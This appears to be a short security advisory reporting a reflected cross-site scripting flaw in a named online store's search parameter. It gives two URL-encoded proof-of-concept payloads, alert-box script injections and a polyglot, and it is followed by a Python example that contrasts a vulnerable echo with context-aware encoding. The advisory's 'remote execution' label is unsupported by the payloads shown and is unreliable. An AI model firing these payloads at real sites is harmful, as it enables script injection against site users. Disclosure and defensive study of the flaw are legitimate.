Author(s): Ivan Sanchez
Product: Google Store
Web: http://www.googlestore.com/googlesearch.aspx?category= [1]

Evil Function:
-------------------
googlesearch.aspx?

Exploiting:
--------------
http://www.googlestore.com/googlesearch.aspx?category=

XSS & Remote Execution Code

Real case, only to check the bug:

http://www.googlestore.com/googlesearch.aspx?category=all&q=%3E%3Cscript%3Ealert%28%27Xss%27%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EBy%2BNullcode.com.ar%3C%2Fh1%3E%3C%2Fmarquee%3E&x=20&y=10 [2]

http://www.googlestore.com/googlesearch.aspx?category=all&q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&x=25

Many Thanks

Ing. Ivan Javier Sanchez
Ivan.Sanchez@nullcode.com.ar
http://www.linkedin.com/in/nullcode

Links:
------
[1] http://www.googlestore.com/googlesearch.aspx?category=
[2] http://www.googlestore.com/googlesearch.aspx?category=all&q=%3E%3Cscript%3Ealert%28%27Xss%27%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EBy%2BNullcode.com.ar%3C%2Fh1%3E%3C%2Fmarquee%3E&x=20&y=10
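As an added example (not code from the advisory), the Python below contrasts the reflection pattern the two PoC URLs exercise, `q` echoed once into the HTML body and once into a JavaScript string, with a context-aware encoding of the same parameter. The page template and all function names are assumptions; only the URLs come from the post.

```python
"""Added example, not from the advisory: context-aware encoding of a reflected
search parameter, checked against the two payload shapes quoted in the post.
The results template (one <p> line plus a JS variable) is an assumption."""
import html
import json
from urllib.parse import parse_qs, urlsplit

# PoC URLs quoted in the advisory (the second trimmed to its last parameter).
ADVISORY_URLS = [
    "http://www.googlestore.com/googlesearch.aspx?category=all&q=%3E%3Cscript%3Ealert%28%27Xss%27%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EBy%2BNullcode.com.ar%3C%2Fh1%3E%3C%2Fmarquee%3E&x=20&y=10",
    "http://www.googlestore.com/googlesearch.aspx?category=all&q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&x=25",
]
# '<' characters the assumed template emits itself: <p>, </p>, <script>, </script>.
TEMPLATE_TAG_COUNT = 4

def extract_q(url: str) -> str:
    """Return the percent-decoded `q` parameter, as the server-side code sees it."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]

def render_vulnerable(q: str) -> str:
    """Echo `q` verbatim into an HTML body and into a JS string literal; this is
    the reflection pattern the advisory's HTML-context and JS-context payloads target."""
    return f"<p>Results for: {q}</p>\n<script>var q = '{q}';</script>"

def render_hardened(q: str) -> str:
    """Encode per context: HTML entities in the body; a JSON string literal in the
    script, with < and > escaped so an embedded </script> cannot close the block."""
    body = html.escape(q, quote=True)
    js = json.dumps(q).replace("<", "\\u003c").replace(">", "\\u003e")
    return f"<p>Results for: {body}</p>\n<script>var q = {js};</script>"

def unexpected_tags(rendered: str) -> int:
    """Count of '<' beyond what the template emits; 0 means no injected markup."""
    return rendered.count("<") - TEMPLATE_TAG_COUNT

def js_literal_roundtrips(rendered: str, q: str) -> bool:
    """True if the JS literal in the hardened output decodes back to `q` unchanged."""
    literal = rendered.split("var q = ", 1)[1].rsplit(";</script>", 1)[0]
    return json.loads(literal) == q

if __name__ == "__main__":
    for url in ADVISORY_URLS:
        q = extract_q(url)
        print(f"vulnerable: {unexpected_tags(render_vulnerable(q))} extra '<' chars; "
              f"hardened: {unexpected_tags(render_hardened(q))}")
```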